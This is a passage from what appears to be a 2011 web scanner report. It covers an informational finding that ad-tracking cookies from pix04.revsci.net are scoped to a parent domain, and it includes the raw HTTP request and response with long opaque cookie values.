Set-Cookie: rsi_segs_1000000=pUPF4jlBeHIMH/C1v6FY5PjO22rQpqLIRj7lzGDK0pZ5a28Qjg614UTo+UUZb5s27MU3p+k1fyDJMFC8UMYTHbX5oy7V/9AyP3MKtaUdhNOZLiDzifUwJ6G017VVI1pv3eQy/8vqbtJkyjk7nE4KE7l/wLZt8DhbakiEW/VLtFEXckivfAVqRuzLjZec6jzqKaqKrjFKfHSYNLNHdNVX11b+xXjbYwlDNyJv0Fhoh3zSBDAaKUDjNkPyWg082tNhETKy7tEFVMoqZ4uQwGoPaO/utnIBrsOkDHbwJWsvQGaGUzBhsCsTUS3GspLlv9PXwnuiXdyyzDdBLkO0mpRqHFg8ZjtJA1IYrzt9napRSvbPxXmagthUik25xORIWYKMM7HWh842q0BgXmYHsemlc/aTVfxqrc4qPByTJ1/04AbqT1ntuJN8Y2uTzuJL7+yhOY5PR6c6iO+wh5akL8lEX9k83bGIOi1VbGjYD104xeGlS2VbjzTa9xmTTzPgR4WxHTJ7rSM8NBbzW1HUX2RVATZ0oTIKIxS+0QrtvdM65TwP8es2F6hzh/35CSJ6tH8UW+bnd52pUZcMb0ML4RJKJeoi4STpyI+wRAv4qTNgQqrlgpxeLO6jE3LM1jGedmZzMbpa44eSz2wwCvt/eg8hvBNb0m9iWVuG7zkS6R6mjJHs5aC0GQaVlR3x7MrPAjqaWMiNPYdtPtZsbjVEz8ALgUQRikbtowMS6xzKwPAZe46dB7pUA25X2IyUW/OMLa+vBIGcp73PBb7SrYs=; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
Set-Cookie: rtc_vsLf=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 173
Date: Wed, 06 Jul 2011 14:01:08 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['K08784_10001'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K08784_10001'],'k08784');}

9.29. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/K08784/b3/0/3/1008211/223509117.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4k9BuXIMH/AtZKgq+tBdHBVM7RYjwSPPC3FVLQFwFuMWG8EbAQsYoI8OaV7WOPjhx2CPcf9OpsZ48ffhgxUKwuHNdaG23oxgOxz4a2BAp5KnJ3kxYWukGTD9NHDu8HXg48nFrD79wjk7auuMDaF0MDEpTr5tMmmNUq38rgsEW4ayA8sCri2difrlqs/ene9+0qYeAfsmIqFs+0h9eFw838xg8/lCR7F0cH8rBUq6YU/9uihuCUcdFDV0an6kUaJ3sBvD3Tkfvy3EISMZa1zqUadhdbND+xUJZWqZWdDr+HWh2QBujcRipZlNYvBhOgEDd3F3DGEKvxZpcwjaLytiu147VLpmewyyiidQoXqce5lKaJk9S7G0XA2JVhoBTiP98/BwqSgIAxs3Z0Zi8eNprpTgeQ+w6Kn7LwNms9soA9Dpsu9og1qQJHB4aseZew+aew5y/ZNYSeIi9cIoxIcsNpQztLdBXXmvC925sWanqfyt8IXbY+LsTOEuFvoxYXAOrMbmM0uFHlGV5PS3E2KKr3EzPWWlX7+RPpv7E7R7U/TEbe0NpiODIG/uPEhR8i9pAEQMKLzhnNI654bV3jfWPCG43Y3UD9Zx10dgLTz3jCnBdPlX/DnObvK3St53/AcO5JCK4ne1hUKbVROkiYw1rfHnvjCM1/MNSlt0upkZwyZlOTkZ69diDWW+QyGqCV3/WgLueQXvOx1RQft/4PPBhoKMH0stGdjEWSwWevbrP9hM2WQ1vCvztSZZTB6+LNnXp3BZhTHV; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
rtc_N0S3=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K08784/b3/0/3/1008211/223509117.js?D=DM_LOC%3Dhttp%253A%252F%252Ftechflash.com%252Fabout.html%253Fpid%253DACBJ%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Ftechflash.com%252F%26DM_EOM%3D1&C=K08784 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_feb9="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyOT+GUT9nKm6Uzd+LKjcZyqckugFnBiR0Zn/IsFdk0/rFRTV9qpAPalIhg6ctdKRDh0s/thiFDr8zSnOiJzdlLV+GP4C0aP3dFLRyc6fD3eGZF5paPafjW8xN/6f61iDbn5Scf4ENowP7/1SoiwONbYeu6xZ2hfIMUOAP0wYi5HYzKJgrBhF1IX9Zd5O2Lmz0H8o1YhUZ/xNsWLqnbPSclagg1uZdIaEEX2X7mU9PpvkuJOErL8VIsMtmNeV8SkFkjFUOet0KGm5k8I/lS57L9061i+BOKKiB821tSxmzJvLeZjNqwNOktGg05gpiheC/gX34NVB3rHtCa9gdCWhoGBjXZ3Vek0xPaJoM2vQggaeofJWjtEizseUAZ8DqB3Bpvl+Q/ml47cZ0lKw7LawXyD58UNXC+2xj1oRnibe6D3B6lsMl4e22RyFZmDR/wOywu2mQO0J9hOUdK+nxEJozkuDVSbShPypBC8wJaxkeC1d41hzQM4nFlVLgxRcm5VUb+1qf+/lRdlarNizuUBS3eo7geSrmwmp6exVCwVOlj2Jj9fP7BnHPXwJ6dP7KZGbHV8En9dfBTXYwWNTvYgYB0GCPL/kkLLy6LUuk48I5Z8DCPCP3tSYk5a3xRXRYElTnYs44OJZ5L5mDPYj0iANpHQO1GLTP1KwhMnVobAuCAHWLm+4VbxffA3CBtNvKLlD/eF/gh5Wod9cqvBiz1hWTb4ij8COotPmMZcvatmS+hAlW9NvQ+GlR3LFrwx9U+2LONu5piZm6OS4EGsv1cip2BRmgE3yUIBr0q2bfQHwV8zdQzhThHV+MbBRAr2AebL+QcAIdxhTgx7JRKxi78B2nJxMoeJWcbPhr/XUIFqDTIthwHCAaAOn7NcAgDUsPznPOHwK62Y2m2wTSVt2bLefzLQrJsgwvV1ckk6OEkoK+K+oMHP390MTlJ6WZKDNPwPIitLRLuNkCr4NNOtgTNHeOehpjGXbCJn/lx1EAfOT9CRrt/F7ACN11dFiLoKmLbYt+lGtiaDq8E1KHPwNqbKR4pWoNzDoCopSiRYRtZD0Ft8IVgJioAjQ13lkHzlURVaOS50U7/4pN4X6i+A+lEz9OikZ1cOVXnRB9R6iyRafnQwrF/CtuR2+gMIjH7yc8soS/mvr9OcOyaNc6cmvTvza7q7WzE7OVGXcqHdC7x6MOkpZyDWhdtS0/OngDWbqYoAwJYpdiyIl1ijllxC4BtQR1dQ98cyYX/4NTwupjWmJACf4Kiw2z+NZXDXEseCmsCSBnARs0RKdPBkBBp7hjHFHKYmmSu9f6e+2ou02jTP8i1fC0GiKn8WlIPQl+P88osPPlstYfuy1877JO+Aq2okYoZqHk/ZQlwR8xUD9RPH8bTf7BU+eXH3xJq0K22dYC5plTYC4BgxUGVWnSwaeyypAv2r+561/B3gCB3gWwWPSZUvs76UJtUVeF7CblPshXTNoZC0YBMuVqFveGNrPuHEXdO0eMCUFxC6EBHId3CNr1Mt5iGiBtNQ=="; rsi_us_1000000="pUMV4j9DMIYVbY/ikx0KzFTj+FP87ZD9RDcPotrS7irqfu3qY4mFlBU4RjWfnjoBtdFs4WH3fJ6SXFZiS4a53zugCH5h+glQPB4sV4//RPT3TI3QN5T82ZUr/EpqQWf4RdnePtzNmGQEQI1D6tOTkfqk+GqQnQi8ZSCEdHfQHI8jIsrKKzwcxCWHgc0f5DJLLb7IRN11f/w+UvgpQsfP7GxBX1VXNiwtkuax2pbE2sMdZZ6ukKQGGhd6zImH+FwTxfJr3h/d58ejzinjY0Y8cCQnIIheka/NCb0ynwHx2Q9HlUftUEe+G8IP9BX9bwrU8+vYG3rcskqPsdoiTWJHWazmGKOyL+BtLxRTQKcggG6nDSHItI2lS4+kqYzKLIlyDDacwVi1Qz6Ynv1arcp3N4ANE70ZCYzt4MwYKV0nR45LNXVmpHW6j3pTpTB+Up1/bxv9LxVoD3G7J6V29zGBXC+ZYf7+Y+zAy/fmMg454372IY6WkhFI/0egVGf/kYE39SJUM5rTcW0Z7lmVNnaFsF27dHeDaQxXEx/cutg3scRto6ngyjpVnMSGKRvlJ+eu7Zn5V/aSgcXvuALUjSEuR7gssyupFlO0wLxymarhFpMK94VXjj5yaQlJ8MUFlCP/qq/Q1MjKTybRe6jEydbnMGIk5KQ+9EzCv/5AKql/SGwGhvGmK59b8mI0H/s59fcnAaYsTRAh/Gk1GeYHUgEDvSZsuQUTI78KkJXzq/pYbk6qPpLWSRfYlS6a4UnXidqrhhMwnIUtmQk83pnjGzweIe9ifQhl0DW31nUdNKCg3kSOV2LuBbISDzIYDN2z9p906jF1FvxrD2xtzxTas48XslO7BtR/Lkh74WCTKmQ2TcR/80YXAs2x54Unx8/hxsRu+6b2TFgabOY74v0H6PliIbZ+0ydXPZvr6GGWt1iBTOoJfcT7e0r0Qe6ZToij8/lnbZLfV+uEDXOLuOPT+JdyEMvMsEn7HcvBF+lm6kNgTKN2N0+RLO2pzEjlrbHdcho1MyFF9RtXqkWiSYP1SK0Z1JpQawf1VOEyblQFx7TAFSHkDq5YarNx1BjiCNSpT4pkc8zWlMERLAj742CxFJcNA7+7bqXIMpeRazq3GjYvq1ZExQxa14EVX3zMvdLiL4537bQzTtImWwRFCeJp1vOWaNCtiBaCCjUkE2AoeBTuAe4c4yZkwslcIwpVDwPnAc3kKPZLY+Z993KEKoXrWe62waOFdM9UyBhhZ8eyiviPRdWN+n5QWZXB/ytQk/EE16yEod9zUfnImrZJQW9Ys8nMLoze9ggGLSwXkoCVW0jHGRYkBUzEn3w0mptRnwXBbU/Ng4L9wDqPV1VjFlj2eXdfBEd2SWiWEoWV6VePTqpTUUoOMH9nsKTy2BqAdM8+Ek6W3257M/WcT6RgFIYhPu9y3eoJOGdX0ulvPgicSTBr+v6691MMM3Rz/UjOBFtYVx3shMKNlsstRh3vd0jUAyZ6258m9TC3vzg4Mry01nPVr29HB6VUElrRvOKGL8L3qbFAhutUcO/UxXT8a1f+Bhn0sp4SoJzDjEp2cmrA6sxh0SZm33XoaXmH3bmvhnpJX401vQl6DH1RWGWhl6f3idkGtOok/Mk4AKZw1ruTMAbId9Eat5e7LdG4+YIdz+UghA39ntHpNv3FgpMH0DEwDClJszcizVL1xoXNjpyDlYFVaZN8VWoDHe8ueyeVUuvLZwNIkyVi6GZHodr4jdrYvXA+PsERFXEqNg49BAC8jJ6+hf3tGtMtpIavStGyayEm8pmgXnw2/dXLA58vkqaROPe/EhQVfRLBrpPtrP5LkdoyM9GtJD4W6ykqZgFFE6WIfcG3GJ03m55lU7HlWlxuXMSDj9oTnVA9DT33GFTIAc+OmYkGrvWKeQflFuagdRs4X42I5wKzsz9acFXUpmJvMuZy5z5LO2t2s+5TmrnpVq0KmuWhwNOQaYsN+7Romyg47j4nSP+0fpyhJKll1yPjWD9tHBkY+R0MUxDV9WvcFQ=="; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rtc_v0Na=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